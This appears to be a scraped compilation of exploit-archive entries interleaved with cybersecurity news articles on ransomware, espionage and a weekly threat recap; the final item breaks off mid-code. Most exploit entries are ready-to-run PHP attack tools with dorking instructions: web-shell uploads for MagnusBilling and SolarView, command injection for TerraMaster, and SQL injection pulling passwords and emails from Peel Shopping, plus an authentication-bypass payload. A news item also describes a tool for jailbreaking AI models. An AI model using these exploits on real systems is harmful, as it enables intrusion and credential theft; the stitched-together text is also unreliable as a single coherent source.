MagnusBilling version 7.x suffers from a remote command injection vulnerability.

=============================================================================================================================================  
| # Title     : MagnusBilling 7.x Code Injection Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.magnusbilling.org/                                                                                              |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 83 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class MagnusBillingExploit {  
    private $targetUri;  
    private $webShellName;

    public function __construct($targetUri) {  
        $this->targetUri = $targetUri;  
    }

    // Function to execute commands on the target  
    public function executeCommand($cmd) {  
        $url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#';  
        return file_get_contents($url); // Send HTTP request  
    }

    // Function to execute PHP code on the target  
    public function executePhp($cmd) {  
        $payload = base64_encode($cmd);  
        $url = $this->targetUri . '/lib/icepay/' . $this->webShellName;  
        $postFields = [$this->postParam => $payload];  
        return $this->sendPostRequest($url, $postFields); // Send POST request  
    }

    // Upload backdoor webshell to the target  
    public function uploadBackdoorWebShell() {  
        // Name of the webshell to be uploaded  
        $this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file

        // Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd')  
        $backdoorCode = "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>";

        // Encode the webshell content  
        $encodedPayload = base64_encode($backdoorCode);

        // Construct the command to upload the backdoor  
        $cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}";

        // Execute the command to upload the backdoor  
        return $this->executeCommand($cmd);  
    }

    // Check if the target can be exploited  
    public function check() {  
        $url = $this->targetUri;  
        $response = file_get_contents($url);  
        if (!$response || !preg_match('/MagnusBilling/i', $response)) {  
            return "Safe: Likely not a MagnusBilling application.";  
        }

        $sleepTime = rand(4, 8);  
        $this->executeCommand("sleep {$sleepTime}");  
        sleep($sleepTime); // Simulate blind command injection

        return "Vulnerable: Command injection successful.";  
    }

    // Main function to exploit the target  
    public function exploit() {  
        echo "Uploading backdoor...\n";  
        $result = $this->uploadBackdoorWebShell();  
        if (!$result) {  
            die("Backdoor upload failed.");  
        }  
        echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n";  
    }

    // Helper function to send POST requests  
    private function sendPostRequest($url, $postFields) {  
        $options = [  
            'http' => [  
                'method' => 'POST',  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'content' => http_build_query($postFields)  
            ]  
        ];  
        $context = stream_context_create($options);  
        return file_get_contents($url, false, $context);  
    }  
}

// Usage example  
$exploit = new MagnusBillingExploit('http://target-url/mbilling');  
$exploit->exploit();

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

MagnusBilling 7.x Command Injection

Bookstore Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Bookstore Management System v1.0 SQL injection Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202303/kashipara.com_bms-zip.zip                              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass : ' or 0=0 ##[+] hLOgin : http://127.0.0.1/BMS/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Bookstore Management System 1.0 SQL Injection

Hey there, it's your weekly dose of "what the heck is going on in cybersecurity land" – and trust me, you NEED to be in the loop this time. We've got everything from zero-day exploits and AI gone rogue to the FBI playing crypto kingpin – it's full of stuff they don't 🤫 want you to know.
So let's jump in before we get FOMO.
⚡ Threat of the Week
GoldenJackal Hacks Air-Gapped Systems: Meet

Hey there, it's your weekly dose of "_what the heck is going on in cybersecurity land_" – and trust me, you NEED to be in the loop this time. We've got everything from zero-day exploits and AI gone rogue to the FBI playing crypto kingpin – it's full of stuff they don't 🤫 want you to know.

So let's jump in before we get FOMO.

****⚡ Threat of the Week****

**GoldenJackal Hacks Air-Gapped Systems:** Meet GoldenJackal, the hacking crew you've probably never heard of – but should definitely know about now. They're busting into super-secure, air-gapped computer systems with sneaky worms spread through infected USB drives (yes, really!), proving that even the most isolated networks aren't safe. ESET researchers caught them red-handed using two different custom-made tools to target high-profile victims, including a South Asian embassy in Belarus and a European Union government organization.

****🔔 Top News****

*   **Mozilla Patches Firefox 0-Day:** Mozilla patched a critical zero-day flaw in its Firefox browser that it said has been actively exploited in the wild to target Tor browser users. While there are currently no details on the attacks, users are advised to update to Firefox 131.0.2, Firefox ESR 128.3.1, and Firefox ESR 115.16.1.
*   **Contagious Interview Remains Lucrative for N. Korea:** Ever since details about a North Korean hacking campaign called Contagious Interview came to light nearly a year ago, it has continued to target the technology sector with no signs of stopping anytime soon. These attacks aim to deliver backdoors and information-stealing malware by deceiving developers into executing malicious code under the pretext of a coding assignment as part of a job interview after approaching them on platforms like LinkedIn.
*   **OpenAI Disrupts Malicious Operations:** OpenAI said it has disrupted over 20 malicious cyber operations since the start of the year that abused its generative artificial intelligence (AI) chatbot, ChatGPT, for debugging and developing malware, spreading misinformation, evading detection, and vulnerability research. One of the activity clusters was observed targeting OpenAI employees via spear-phishing attacks to deploy the SugarGh0st RAT.
*   **FBI Creates Fake Crypto to Disrupt Fraudulent Operation:** The U.S. Federal Bureau of Investigation (FBI) took the "unprecedented step" of creating its own cryptocurrency token and a company called NexFundAI to take down a fraud operation that allegedly manipulated digital asset markets by orchestrating an illegal scheme known as wash trading. A total of 18 people and entities have been charged in connection with the pump-and-dump scam, with three arrests reported so far.
*   **Gorilla Botnet Launches 300,000 DDoS Attacks Across 100 Countries:** A botnet malware family called Gorilla issued over 300,000 attack commands in the month of September 2024 alone, targeting universities, government websites, telecoms, banks, gaming, and gambling sectors. China, the U.S., Canada, and Germany. The botnet is based on the leaked Mirai botnet source code.

****📰 Around the Cyber World****

*   **Microsoft Announces Windows 11 Security Baseline:** Microsoft has released the Windows 11, version 24H2 security baseline with added protections to LAN Manager, Kerberos, User Account Control, and Microsoft Defender Antivirus. It also includes Windows Protected Print (WPP), which the company described as the "new, modern and more secure print for Windows built from the ground up with security in mind." In a related development, the tech giant announced a redesigned Windows Hello experience and API support for third-party passkey providers like 1Password and Bitwarden to plug into the Windows 11 platform.
*   **Apple macOS iPhone Mirroring is Broken:** Apple announced a new iPhone mirroring feature with macOS 15.0 Sequoia, but cybersecurity firm Sevco has uncovered a privacy risk that could expose metadata associated with apps on an employee's personal iPhone to their corporate IT department. The issue stems from the fact that the iOS apps mirrored to the Mac populate the same application metadata as native macOS applications, thereby leaking information about the apps that may be installed on their phones. Apple has acknowledged the problem and is said to be working on a fix.
*   **Social Engineering Via Phone Calls:** Threat actors have found an effective social engineering vector in phone calls in order to trick users into performing an unintended action, a technique also called telephone-oriented attack delivery (TOAD), callback phishing, and hybrid vishing (a combination of voice and phishing). Intel 471 said it has observed a "sharp increase in underground offers for illicit call center services that can aid in malware delivery, ransomware-related calls, and other fraud-oriented social-engineering attempts."
*   **Malicious Extensions Can Bypass Manifest V3:** Google has said Manifest V3, its latest version of the extensions platform, avoids the security loopholes of its predecessor, which allowed browser add-ons to have excessive permissions and inject arbitrary JavaScript. However, new research has found that it's still possible for malicious actors to exploit minimal permissions and steal data. The findings were presented by SquareX at the DEF CON conference back in August. The research also coincides with a study that discovered "hundreds of extensions automatically extracting user content from within web pages, impacting millions of users."
*   **What can a USB reveal?:** A new analysis from Group-IB goes into detail about the artifacts generated in the USB device when files are accessed or modified on devices running various operating systems. "USB formatted with NTFS, FAT32, and ExFAT often create temporary files, particularly during file modifications," the company said. "USB formatted with NTFS on Windows provided more information on file system changes from the $Logfile due to its journaling capabilities." USB formatted with HFS+ has been found to store versions of files that have been edited with GUI tools in a versioning database. Likewise, USB formatted with FAT32/ExFAT on macOS generates ". \_filename" files to ensure file system compatibility for storing extended attributes.

**🔥 **Cybersecurity Resources & Insights****

*   **Expert Webinars**
    *   **Building a Successful Data Security Posture Management Program**: Drowning in data security headaches? Hear directly from Global-e's CISO how Data Security Posture Management (DSPM) transformed their data security. Get real-world insights, and practical advice, get your questions answered and actionable strategies in this exclusive webinar, and walk away with a clear roadmap. Reserve your seat today!
    *   **Ex-Mandiant Expert Exposes Identity Theft Tactics**: LUCR-3 is breaching organizations like yours through identity-based attacks. Learn how to protect your cloud and SaaS environments from this advanced threat. Cybersecurity expert Ian Ahl (former Mandiant) reveals the latest tactics and how to defend your organization. Register for this crucial webinar to gain the upper hand.
*   **Ask the Expert**
    *   **Q: With mobile devices increasingly targeted by cybercriminals, how can individuals protect their devices from network-based attacks, especially in unfamiliar or high-risk environments, such as when traveling?**
    *   **A:** When you're traveling, your mobile device can be a target for attacks like rogue base stations—fake cell towers set up to steal data or track your location. To protect yourself, start by enabling Lockdown Mode on iPhones, which blocks vulnerable 2G connections. Always use a VPN to keep your internet traffic encrypted and avoid using public Wi-Fi without it. A great tool to boost your awareness is the CellGuard app for iOS. It scans your network for suspicious activity, like rogue base stations, by analyzing things like signal strength and network anomalies. While it may flag some false alarms, it gives you an extra layer of protection.
*   **Cybersecurity Tools**
    *   **Broken Hill: A New Tool to Test AI Models' Weaknesses** \- It is an advanced tool that makes it easy to trick large AI models into misbehaving by bypassing their restrictions. It uses the Greedy Coordinate Gradient (GCG) attack to craft clever prompts that push popular models, like Llama-2 and Microsoft's Phi, to respond in ways they normally wouldn't. The best part? You can run it on consumer GPUs, like the Nvidia RTX 4090, without needing costly cloud servers. Ideal for researchers and security testers, Broken Hill helps uncover and fix vulnerabilities in AI models, making it a must-have tool in the fight against AI threats.
*   **Tip of the Week**
    *   **Your Browser Extensions Are Spying on You:** Browser extensions can be useful but also risky, with potential access to your data or hidden malware. Protect yourself by removing unused extensions, checking their permissions, and only allowing them to run on specific sites. Enable "Click to activate" for more control, and use tools like Chrome's Extension Source Viewer to spot any suspicious behavior. Keep extensions updated, monitor network traffic for unusual activity, and consider using a separate browser for sensitive tasks. Features like Firefox's Temporary Container Tabs can also help by isolating extension access. These simple steps can keep your browsing safer.

****Conclusion****

And that's how the cybersecurity cookie crumbles this week! But listen, before you log off and chill, remember this: always double-check the sender's email address before clicking any links, even if it looks like it's from your bestie or your bank. Phishing scams are getting sneakier than ever, so stay sharp! Until next time, stay safe and cyber-aware!

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

THN Cybersecurity Recap: Top Threats, Tools and Trends (Oct 7 - Oct 13)

Threat actors are actively attempting to exploit a now-patched security flaw in Veeam Backup & Replication to deploy Akira and Fog ransomware.
Cybersecurity vendor Sophos said it has been tracking a series of attacks in the past month leveraging compromised VPN credentials and CVE-2024-40711 to create a local account and deploy the ransomware.
CVE-2024-40711, rated 9.8 out of 10.0 on the

Ransomware / Vulnerability

Threat actors are actively attempting to exploit a now-patched security flaw in Veeam Backup & Replication to deploy Akira and Fog ransomware.

Cybersecurity vendor Sophos said it has been tracking a series of attacks in the past month leveraging compromised VPN credentials and CVE-2024-40711 to create a local account and deploy the ransomware.

CVE-2024-40711, rated 9.8 out of 10.0 on the CVSS scale, refers to a critical vulnerability that allows for unauthenticated remote code execution. It was addressed by Veeam in Backup & Replication version 12.2 in early September 2024.

Security researcher Florian Hauser of Germany-based CODE WHITE has been credited with discovering and reporting security shortcomings.

"In each of the cases, attackers initially accessed targets using compromised VPN gateways without multifactor authentication enabled," Sophos said. "Some of these VPNs were running unsupported software versions."

"Each time, the attackers exploited VEEAM on the URI /trigger on port 8000, triggering the Veeam.Backup.MountService.exe to spawn net.exe. The exploit creates a local account, 'point,' adding it to the local Administrators and Remote Desktop Users groups."

In the attack that led to the Fog ransomware deployment, the threat actors are said to have drop the ransomware to an unprotected Hyper-V server, while using the rclone utility to exfiltrate data. The other ransomware deployments were unsuccessful.

The active exploitation of CVE-2024-40711 has prompted an advisory from NHS England, which noted that "enterprise backup and disaster recovery applications are valuable targets for cyber threat groups."

The disclosure comes as Palo Alto Networks Unit 42 detailed a successor to INC ransomware named Lynx that has been active since July 2024, targeting organizations in retail, real estate, architecture, financial, and environmental services sectors in the U.S. and U.K.

The emergence of Lynx is said to have been spurred by the sale of INC ransomware's source code on the criminal underground market as early as March 2024, prompting malware authors to repackage the locker and spawn new variants.

"Lynx ransomware shares a significant portion of its source code with INC ransomware," Unit 42 said. "INC ransomware initially surfaced in August 2023 and had variants compatible with both Windows and Linux."

It also follows an advisory from the U.S. Department of Health and Human Services (HHS) Health Sector Cybersecurity Coordination Center (HC3) that at least one healthcare entity in the country has fallen victim to Trinity ransomware, another relatively new ransomware player that first became known in May 2024 and is believed to be a rebrand of 2023Lock and Venus ransomware.

"It is a type of malicious software that infiltrates systems through several attack vectors, including phishing emails, malicious websites, and exploitation of software vulnerabilities," HC3 said. "Once inside the system, Trinity ransomware employs a double extortion strategy to target its victims."

Cyber attacks have also been observed delivering a MedusaLocker ransomware variant dubbed BabyLockerKZ by a financially motivated threat actor known to be active since October 2022, with targets primarily located in the E.U. countries and South America.

"This attacker uses several publicly known attack tools and living-off-the-land binaries (LoLBins), a set of tools built by the same developer (possibly the attacker) to assist in credential theft and lateral movement in compromised organizations," Talos researchers said.

"These tools are mostly wrappers around publicly available tools that include additional functionality to streamline the attack process and provide graphical or command-line interfaces."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Veeam Vulnerability Exploited to Spread Akira and Fog Ransomware

Peel Shopping versions 2.x and below 3.1 suffer from cross site scripting and remote SQL injection vulnerabilities. This was already noted discovery in 2012 by Cyber-Crystal but this data provides more details.

    # Exploit Title: Peel Shopping "catid=" SQL injection# Google Dork: inurl:/lire/index.php?rubid=# Date: 2024-10-02# Exploit Author: Emiliano Febbi# Vendor Homepage: https://www.peel-shopping.com/# Software Link: https://github.com/advisto/peel-shopping# Version: 2.x < 3.1# Tested on: Windows 10##                                   USAGE:                                            ##                                                                                ##                                     1                                               ####If you want test this query: produit_details.php?id=1000&catid=100 you need db name. ####                                     2                                               ####If you want test this single parameter index.php?catid= leave the field with default.####                                     3                                               ####If you want test this parameter index.php?rubid= don't you need db name. (#Expl-3)   ####                                  Details:                                           ####You can also test the search module affected by XSS.                                 ####If you see many iframes are the switch of the tables or parameters;carefully use the ## ##characters '/' in the full path and '-' before the numericals vars.                  ###########################################################################################                                                                                   #########################################################################################*****************************************************************************************[code] Multiple Vulnerabilities exploit [tested]<?phpecho '<html><head><title>Peel Shopping 2.x < 3.1 "catid=" SQL injection</title></head><body><body bgcolor="black"><font color="white"><center><pre>##################################Peel Shopping 2.x < 3.1 Exploit##vuln finder!                   ##Code by Emiliano Febbi - 2024  ##################################( first get db name and later run exploit )</pre><h2>#Expl-1</h2>1 [#Query interested] -> produit_details.php?id=1000&catid=100 AND index.php?catid=<br><br><form action="'.$SERVER[PHP_SELF].'" method="post"><font color="white">#Get Database Name:<font color="red"><br>(*Format: http://www.site.fr/produit_details.php?id=1000&catid=-100)</font><br><input type="text" name="victim_site"><input type="submit" value="Get!"></form><br><font color="yellow">###########################################################</font><form action="'.$SERVER[PHP_SELF].'" method="post"><font color="white">[#insert victim site]:<font color="red"><br>(*Format: http://www.site.fr/produit_details.php?id=1000&catid=-100)</font> or<br><font color="lime">(*http://www.site.fr/index.php?catid=-1)</font><- DB_Name default<br><input type="text" name="victim_sitee"><br>[#insert database name]:<br><input type="text" name="victim_db" value="default"><input type="submit" value="LOAD"></form><br><font color="yellow">###########################################################</font><br><h2>#Expl-2</h2><form action="'.$SERVER[PHP_SELF].'" method="post"><font color="white">#XSS Test[search_module]:<font color="red"><br>(*Format: http://www.site.fr/)</font><br><input type="text" name="site_XSS" value="http://www.site.fr/"><input type="submit" value="test!"></form><br><font color="yellow">###########################################################</font><br></font></body></center></html>';if($_POST['victim_site']) {$site = $_POST['victim_site'];print "<center><font color='red'>#DB_Name:</font>(try-1)<br>";$gettt=file_get_contents("$site%20union%20all%20select%201,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)--");     $tags=explode('<td class="petit">',$gettt);                    $tags=explode("</td>",$tags[1]);    $cleaning = array("performance_schema","information_schema",           "Accueil",              "Vous",               "ici",               "tes",    );            $ok = "";    $filtred = str_replace($cleaning, $ok, $tags[0]);     var_dump(strip_tags($filtred));          print "</center><br><br>";          print "<center><font color='red'>#DB_Name:</font>(try-2)<br>";$gettts=file_get_contents("$site%20union%20all%20select%201,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)--");     $tagss=explode('information_schema<br>',$gettts);                      $tagss=explode('" href=',$tagss[1]);          $filtreds = str_replace($cleaning, $ok, $tagss[0]);                      var_dump(strip_tags($filtreds));                                                     };;/*#exploit*/if($_POST['victim_sitee'] and $_POST['victim_db']) {$sitee = $_POST['victim_sitee']; $hack_db = $_POST['victim_db'];?><center><font color='lime'>1- #ALL @E-Mail and Users: ~table -><font color='white'>peel_utilisateurs</font></font>-> id=&catid=<br><iframe src='<? echo "$sitee"; ?>%20union%20all%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM(<? echo "$hack_db"; ?>.peel_utilisateurs)WHERE(@x)IN(@x:=CONCAT(0x20,@x,mot_passe,email,0x3c62723e))))x)--' title='exploit' height='100' width='500'></iframe><br><font color="yellow">###########################################################</font><br><font color='lime'>2- #ALL @E-Mail and Users: ~table -><font color='white'>utilisateurs</font></font>-> id=&catid=<br><iframe src='<? echo "$sitee"; ?>%20union%20all%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM(<? echo "$hack_db"; ?>.utilisateurs)WHERE(@x)IN(@x:=CONCAT(0x20,@x,mot_passe,email,0x3c62723e))))x)--' title='exploit' height='100' width='500'></iframe><br><font color='lime'>3- #ALL @E-Mail and Users: ~table -><font color='white'>peel_utilisateurs</font></font>-> catid=<br><iframe src='<? echo "$sitee"; ?>+union+all+select+1,mot_passe,3,4+FROM+peel_utilisateurs--' title='exploit' height='100' width='500'></iframe></center><?print "<center><font color='red'>[emails cracked]+md5:</font><br>";$textt=file_get_contents("$sitee+%20union%20all%20select%201,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM($hack_db.peel_utilisateurs)WHERE(@x)IN(@x:=CONCAT(0x20,@x,mot_passe,email,0x3c62723e))))x)--");$ress = preg_match_all("/[a-z0-9]+[_a-z0-9\.-]*[a-z0-9]+@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})/i",$textt,$matchess);if ($ress) {foreach(array_unique($matchess[0]) as $emails) {echo $emails . "<br />";}}else {echo "No emails found.";}};;;/*#exploit*/echo '<center><h2>#Expl-3</h2><br><form action="'.$SERVER[PHP_SELF].'" method="post"><font color="white">independent -> #try again to hack!:</font><font color="red"><br>(*Format: http://www.site.fr)</font><br><input type="text" name="hack2" value="http://www.site.fr"><br><input type="submit" value="LOAD"></center><br>';if($_POST['hack2']) {$hackk = $_POST['hack2'];echo '<center><br><font color="yellow">###########################################################</font><br>';           echo "2 [#Query interested] -> index.php?rubid=<br><font color='red'>#password1:</font>(try-1)<br>";?><iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe,3+FROM+peel_utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br><font color='red'>#password2:</font>(try-2)<br><iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe,3+FROM+utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br><font color='red'>#password3:</font>(try-3)<br><iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe+FROM+peel_utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br><font color='red'>#password4:</font>(try-4)<br><iframe src='<? echo "$hackk/index.php?rubid=-3+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,mot_passe+FROM+utilisateurs--"; ?>' title='exploit' height='100' width='500'></iframe><br><?print "<font color='red'>[emails cracked]:</font><br>";$text=file_get_contents("$hackk/index.php?rubid=-1+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,email,3%20FROM%20peel_utilisateurs--");$res = preg_match_all("/[a-z0-9]+[_a-z0-9\.-]*[a-z0-9]+@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})/i",$text,$matches);if ($res) {foreach(array_unique($matches[0]) as $email) {echo $email . "<br />";}}else {echo "No emails found.";}};;;;;/*#exploit*/if($_POST['site_XSS']) {$XSS = $_POST['site_XSS'];?><center><iframe src='<? echo "$XSS"; ?>recherche.php?start=0&motclef=<script>alert("XSS vulnerable!")</script>' title='exploit3' height='100' width='500'></iframe></center><br><?};;;;?>[/code]

Peel Shopping 2.x Cross Site Scripting / SQL Injection

The Iranian threat actor known as OilRig has been observed exploiting a now-patched privilege escalation flaw impacting the Windows Kernel as part of a cyber espionage campaign targeting the U.A.E. and the broader Gulf region.
"The group utilizes sophisticated tactics that include deploying a backdoor that leverages Microsoft Exchange servers for credentials theft, and exploiting vulnerabilities

The Iranian threat actor known as OilRig has been observed exploiting a now-patched privilege escalation flaw impacting the Windows Kernel as part of a cyber espionage campaign targeting the U.A.E. and the broader Gulf region.

"The group utilizes sophisticated tactics that include deploying a backdoor that leverages Microsoft Exchange servers for credentials theft, and exploiting vulnerabilities like CVE-2024-30088 for privilege escalation," Trend Micro researchers Mohamed Fahmy, Bahaa Yamany, Ahmed Kamal, and Nick Dai said in an analysis published on Friday.

The cybersecurity company is tracking the threat actor under the moniker Earth Simnavaz, which is also referred to as APT34, Crambus, Cobalt Gypsy, GreenBug, Hazel Sandstorm (formerly EUROPIUM), and Helix Kitten.

The attack chains entail the deployment of a previously undocumented implant that comes with capabilities to exfiltrate credentials through on-premises Microsoft Exchange servers, a tried-and-tested tactic adopted by the adversary in the past, while also incorporating recently disclosed vulnerabilities to its exploit arsenal.

CVE-2024-30088, patched by Microsoft in June 2024, concerns a case of privilege escalation in the Windows kernel that could be exploited to gain SYSTEM privileges, assuming the attackers can win a race condition.

Initial access to target networks is facilitated by means of infiltrating a vulnerable web server to drop a web shell, followed by dropping the ngrok remote management tool to maintain persistence and move to other endpoints in the network.

The privilege escalation vulnerability subsequently serves as a conduit to deliver the backdoor, codenamed STEALHOOK, responsible for transmitting harvested data via the Exchange server to an email address controlled by the attacker in the form of attachments.

A notable technique employed by OilRig in the latest set of attacks involves the abuse of the elevated privileges to drop the password filter policy DLL (psgfilter.dll) in order to extract sensitive credentials from domain users via domain controllers or local accounts on local machines.

"The malicious actor took great care in working with the plaintext passwords while implementing the password filter export functions," the researchers said. "The threat actor also utilized plaintext passwords to gain access and deploy tools remotely. The plaintext passwords were first encrypted before being exfiltrated when sent over networks."

It's worth noting that the use of psgfilter.dll was observed back in December 2022 in a connection with a campaign targeting organizations in the Middle East using another backdoor dubbed MrPerfectionManager.

"Their recent activity suggests that Earth Simnavaz is focused on abusing vulnerabilities in key infrastructure of geopolitically sensitive regions," the researchers noted. "They also seek to establish a persistent foothold in compromised entities, so these can be weaponized to launch attacks on additional targets."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

OilRig Exploits Windows Kernel Flaw in Espionage Campaign Targeting UAE and Gulf

TerraMaster TOS version 4.2.29 suffers from a remote code injection vulnerability leveraging a local file inclusion vulnerability.

    =============================================================================================================================================| # Title     : TerraMaster TOS 4.2.29 Code Injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.terra-master.com/global/alltos/                                                                                 |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 138 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass TerraMasterExploit{    private $targetUri;    private $data = [];    private $terramaster = [];    public function __construct($targetUri)    {        $this->targetUri = rtrim($targetUri, '/') . '/';    }    public function getData()    {        // Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`        $response = $this->sendRequest('POST', 'module/api.php?mobile/webNasIPS', ['User-Agent' => 'TNAS']);                if ($response && strpos($response, 'webNasIPS successful') !== false) {            // Parse the JSON response and get the data            $resJson = json_decode($response, true);            if (!empty($resJson['data'])) {                $this->data['password'] = trim(explode('SAT', explode('PWD:', $resJson['data'])[1])[0]);                $this->data['mac'] = trim(explode('"', explode('mac":"', $resJson['data'])[1])[0]);                $this->data['key'] = substr($this->data['mac'], 6, 6); // last three MAC address entries                $this->data['timestamp'] = time();                // derive signature                $this->data['signature'] = $this->tosEncryptStr($this->data['key'], $this->data['timestamp']);            }        }    }    private function tosEncryptStr($key, $strToEncrypt)    {        $id = $key . $strToEncrypt;        return md5($id);    }    public function executeCommand($cmd)    {        // Execute RCE using vulnerable endpoint `api.php?mobile/createRaid`        $diskstring = $this->generateRandomString(4, 8);        $headers = [            'User-Agent' => 'TNAS',            'Authorization' => $this->data['password'],            'Signature' => $this->data['signature'],            'Timestamp' => $this->data['timestamp']        ];        $this->sendRequest('POST', 'module/api.php?mobile/createRaid', [            'raidtype' => ';' . $cmd,            'diskstring' => $diskstring        ], $headers);    }    public function getTerramasterInfo()    {        // get Terramaster CPU architecture and TOS version        $response = $this->sendRequest('GET', 'tos/index.php?user/login');        if ($response) {            preg_match('/ver=.+?"/', $response, $matches);            if ($matches) {                $version = $matches[0];                // check if architecture is ARM64 or X64                if (strpos($version, '_A') !== false) {                    $this->terramaster['cpu_arch'] = 'ARM64';                } elseif (strpos($version, '_S') !== false || strpos($version, '_Q') !== false) {                    $this->terramaster['cpu_arch'] = 'X64';                } else {                    $this->terramaster['cpu_arch'] = 'UNKNOWN';                }                // strip TOS version number and remove trailing double quote.                $this->terramaster['tos_version'] = rtrim(substr($version, strpos($version, '.0_') + 3), '"');            }        }    }    public function check()    {        $this->getTerramasterInfo();        if (empty($this->terramaster)) {            return 'Safe';        }        if (version_compare($this->terramaster['tos_version'], '4.2.29', '<=') === 0) {            return "Vulnerable: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";        }        return "Safe: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";    }    public function exploit()    {        $this->getData();        if (empty($this->data)) {            throw new Exception('Cannot retrieve the leaked data.');        }        echo "Executing exploit...\n";        // Example command to execute        $this->executeCommand('whoami'); // Replace 'whoami' with desired command    }    private function sendRequest($method, $uri, $data = [], $headers = [])    {        $url = $this->targetUri . $uri;        $options = [            CURLOPT_RETURNTRANSFER => true,            CURLOPT_CUSTOMREQUEST => strtoupper($method),            CURLOPT_HTTPHEADER => array_merge(['Content-Type: application/x-www-form-urlencoded'], $headers)        ];        if (strtoupper($method) === 'POST') {            $options[CURLOPT_POSTFIELDS] = http_build_query($data);        } else {            $options[CURLOPT_URL] = $url;        }        $ch = curl_init();        curl_setopt_array($ch, $options);        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    private function generateRandomString($minLength, $maxLength)    {        $length = rand($minLength, $maxLength);        return substr(str_shuffle(str_repeat("ABCDEFGHIJKLMNOPQRSTUVWXYZ", $maxLength)), 0, $length);    }}// Usage$exploit = new TerraMasterExploit('http://target-terramaster-url.com');$check = $exploit->check();echo $check . "\n";if (strpos($check, 'Vulnerable') !== false) {    $exploit->exploit();}Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

TerraMaster TOS 4.2.29 Code Injection / Local File Inclusion

SolarView Compact version 6.00 suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : SolarView Compact 6.00 Code Injection Vulnerability                                                                         |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.contec.com/                                                                                                     |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 112 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class SolarViewExploit {  
    private $targetUri;  
    private $webshellName;  
    private $postParam;  
    private $timeout;

    public function __construct($targetUri, $timeout = 40) {  
        $this->targetUri = rtrim($targetUri, '/');  
        $this->timeout = $timeout;  
    }

    public function uploadWebshell($webshell = null) {  
        // Randomize file name if option WEBSHELL is not set  
        $this->webshellName = $webshell ?? $this->generateRandomFileName();

        $this->postParam = $this->generateRandomString(8);

                // Inject PHP payload into the PLTE chunk of a PNG image to hide the payload  
        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";  
        $pngWebshell = $this->injectPhpPayloadPng($phpPayload);

        if ($pngWebshell === null) {  
            return null;  
        }

        // Encode webshell data and write to file on the target at the tmp directory for execution  
        $payload = base64_encode($pngWebshell);  
